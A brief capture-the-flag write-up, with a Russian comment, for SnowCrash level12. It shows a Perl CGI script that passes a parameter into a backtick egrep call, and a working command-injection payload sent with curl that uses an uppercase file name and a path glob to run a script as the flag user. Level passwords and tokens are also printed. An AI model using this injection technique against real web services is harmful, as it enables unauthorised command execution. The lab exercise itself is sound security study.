su level12
fa6v5ateaw21peobuub8ipe6s

level12@SnowCrash:~$ ls -l
total 4
-rwsr-sr-x+ 1 flag12 level12 464 Mar  5  2016 level12.pl

level12@SnowCrash:~$ ./level12.pl
Content-type: text/html



..level12@SnowCrash:~$ cat level12.pl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/;
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }
}

n(t(param("x"), param("y")));


вызывается egrep оторый использует регулярное вырожение, создаем файл с именем в верхнем регистре чтобы заменить ею регулярку


echo "getflag>/tmp/getflag">/tmp/TMP
chmod +x /tmp/TMP
curl 127.0.0.1:4646?x='`/*/TMP`'

level12@SnowCrash:~$ cat /tmp/getflag
Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr

su level13
g1qKMiRpXf53AWhDaU7FEkczr
